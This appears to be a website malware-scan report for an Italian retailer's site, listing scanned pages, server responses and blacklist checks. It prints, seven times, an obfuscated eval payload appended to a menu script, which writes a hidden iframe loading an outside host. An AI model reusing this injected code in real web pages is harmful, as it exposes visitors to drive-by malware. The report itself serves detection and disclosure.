Scanned pages/files
Request | Server response | Status |
http://ducadivaltorta.it/ | 200 OK Content-Length: 12910 Content-Type: text/html | clean |
http://ducadivaltorta.it/scripts/prototype.js | 200 OK Content-Length: 141163 Content-Type: application/javascript | clean |
http://ducadivaltorta.it/jscript.asp?wh=04/09/2014 22:51:29 | 200 OK Content-Length: 49404 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var cssdropdown={ disappeardelay: 250, disablemenuclick: false, enableswipe: 1, enableiframeshim: 1, dropmenuobj: null, ie: document.all, firefox: document.getElementById&&!document.all, swipetimer: undefined, bottomclip:0, getposOffset:function(what, offsettype){ var totaloffset=(offsettype=="left")? what.offsetLeft : what.offsetTop; var parentEl=what.offsetParent; while (parentEl!=null){ totaloffset=(offsettype=="left")? totaloffset+paren default: } }<!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://ducadivaltorta.it/default.asp?content=1,37,0,0,0,HOME,00.html | 200 OK Content-Length: 12910 Content-Type: text/html | clean |
http://ducadivaltorta.it/jscript.asp?wh=04/09/2014 22:51:37 | 200 OK Content-Length: 49404 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var cssdropdown={ disappeardelay: 250, disablemenuclick: false, enableswipe: 1, enableiframeshim: 1, dropmenuobj: null, ie: document.all, firefox: document.getElementById&&!document.all, swipetimer: undefined, bottomclip:0, getposOffset:function(what, offsettype){ var totaloffset=(offsettype=="left")? what.offsetLeft : what.offsetTop; var parentEl=what.offsetParent; while (parentEl!=null){ totaloffset=(offsettype=="left")? totaloffset+paren default: } }<!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://ducadivaltorta.it/default.asp?content=1,2,0,0,0,CHI_SIAMO,00.html | 200 OK Content-Length: 8140 Content-Type: text/html | clean |
http://ducadivaltorta.it/jscript.asp?wh=04/09/2014 22:51:42 | 200 OK Content-Length: 49404 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var cssdropdown={ disappeardelay: 250, disablemenuclick: false, enableswipe: 1, enableiframeshim: 1, dropmenuobj: null, ie: document.all, firefox: document.getElementById&&!document.all, swipetimer: undefined, bottomclip:0, getposOffset:function(what, offsettype){ var totaloffset=(offsettype=="left")? what.offsetLeft : what.offsetTop; var parentEl=what.offsetParent; while (parentEl!=null){ totaloffset=(offsettype=="left")? totaloffset+paren default: } }<!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://ducadivaltorta.it/default.asp?content=1,4,2,0,0,-_La_sede:_il_´Mulino_di_Ferro´,00.html | 200 OK Content-Length: 9572 Content-Type: text/html | clean |
http://ducadivaltorta.it/jscript.asp?wh=04/09/2014 22:51:46 | 200 OK Content-Length: 49404 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var cssdropdown={ disappeardelay: 250, disablemenuclick: false, enableswipe: 1, enableiframeshim: 1, dropmenuobj: null, ie: document.all, firefox: document.getElementById&&!document.all, swipetimer: undefined, bottomclip:0, getposOffset:function(what, offsettype){ var totaloffset=(offsettype=="left")? what.offsetLeft : what.offsetTop; var parentEl=what.offsetParent; while (parentEl!=null){ totaloffset=(offsettype=="left")? totaloffset+paren default: } }<!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://ducadivaltorta.it/default.asp?content=1,29,2,0,0,-_Rassegna_stampa,00.html | 200 OK Content-Length: 7171 Content-Type: text/html | clean |
http://ducadivaltorta.it/jscript.asp?wh=04/09/2014 22:51:51 | 200 OK Content-Length: 49404 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var cssdropdown={ disappeardelay: 250, disablemenuclick: false, enableswipe: 1, enableiframeshim: 1, dropmenuobj: null, ie: document.all, firefox: document.getElementById&&!document.all, swipetimer: undefined, bottomclip:0, getposOffset:function(what, offsettype){ var totaloffset=(offsettype=="left")? what.offsetLeft : what.offsetTop; var parentEl=what.offsetParent; while (parentEl!=null){ totaloffset=(offsettype=="left")? totaloffset+paren default: } }<!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://ducadivaltorta.it/default.asp?content=1,30,2,0,0,-_Duca_di_Valtorta_Golf_Cup,00.html | 200 OK Content-Length: 8585 Content-Type: text/html | clean |
http://ducadivaltorta.it/jscript.asp?wh=04/09/2014 22:51:56 | 200 OK Content-Length: 49404 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var cssdropdown={ disappeardelay: 250, disablemenuclick: false, enableswipe: 1, enableiframeshim: 1, dropmenuobj: null, ie: document.all, firefox: document.getElementById&&!document.all, swipetimer: undefined, bottomclip:0, getposOffset:function(what, offsettype){ var totaloffset=(offsettype=="left")? what.offsetLeft : what.offsetTop; var parentEl=what.offsetParent; while (parentEl!=null){ totaloffset=(offsettype=="left")? totaloffset+paren default: } }<!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://ducadivaltorta.it/default.asp?content=1,3,0,0,0,IL_CASHMERE,00.html | 200 OK Content-Length: 36405 Content-Type: text/html | clean |
http://ducadivaltorta.it/jscript.asp?wh=04/09/2014 22:52:01 | 200 OK Content-Length: 49404 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var cssdropdown={ disappeardelay: 250, disablemenuclick: false, enableswipe: 1, enableiframeshim: 1, dropmenuobj: null, ie: document.all, firefox: document.getElementById&&!document.all, swipetimer: undefined, bottomclip:0, getposOffset:function(what, offsettype){ var totaloffset=(offsettype=="left")? what.offsetLeft : what.offsetTop; var parentEl=what.offsetParent; while (parentEl!=null){ totaloffset=(offsettype=="left")? totaloffset+paren default: } }<!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ducadivaltorta.it
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 04 Sep 2014 20:51:32 GMT
Server: Microsoft-IIS/8.5
Content-Length: 12910
Content-Type: text/html
Set-Cookie: catflash=0; path=/
Set-Cookie: b2b=; path=/
Set-Cookie: sessionordine=107110195; expires=Tue, 02-Dec-2014 23:00:00 GMT; path=/
Set-Cookie: sessionord=paypal=No; path=/
Set-Cookie: idcollezione=0; path=/
Set-Cookie: idcountry=1; expires=Tue, 02-Dec-2014 23:00:00 GMT; path=/
Set-Cookie: sessionlingua=1; expires=Tue, 02-Dec-2014 23:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDAQDASBAD=DDPFCGGANKGPEAJEGJGCFGFN; path=/
Set-Cookie: dadaproaffinity=90af62962afc970dbe11dee2b75a61bb075be69a4561e079b367b34670e50fb2;Path=/;Domain=ducadivaltorta.it
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
...12910 bytes of data.
GET / HTTP/1.1
Host: ducadivaltorta.it
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 04 Sep 2014 20:51:32 GMT
Server: Microsoft-IIS/8.5
Content-Length: 12910
Content-Type: text/html
Set-Cookie: catflash=0; path=/
Set-Cookie: b2b=; path=/
Set-Cookie: sessionordine=107110195; expires=Tue, 02-Dec-2014 23:00:00 GMT; path=/
Set-Cookie: sessionord=paypal=No; path=/
Set-Cookie: idcollezione=0; path=/
Set-Cookie: idcountry=1; expires=Tue, 02-Dec-2014 23:00:00 GMT; path=/
Set-Cookie: sessionlingua=1; expires=Tue, 02-Dec-2014 23:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDAQDASBAD=DDPFCGGANKGPEAJEGJGCFGFN; path=/
Set-Cookie: dadaproaffinity=90af62962afc970dbe11dee2b75a61bb075be69a4561e079b367b34670e50fb2;Path=/;Domain=ducadivaltorta.it
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
...12910 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ducadivaltorta.it
Referer: http://www.google.com/search?q=ducadivaltorta.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ducadivaltorta.it
Referer: http://www.google.com/search?q=ducadivaltorta.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ducadivaltorta.it
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ducadivaltorta.it/
Result: ducadivaltorta.it is not infected or malware details are not published yet.
Result: ducadivaltorta.it is not infected or malware details are not published yet.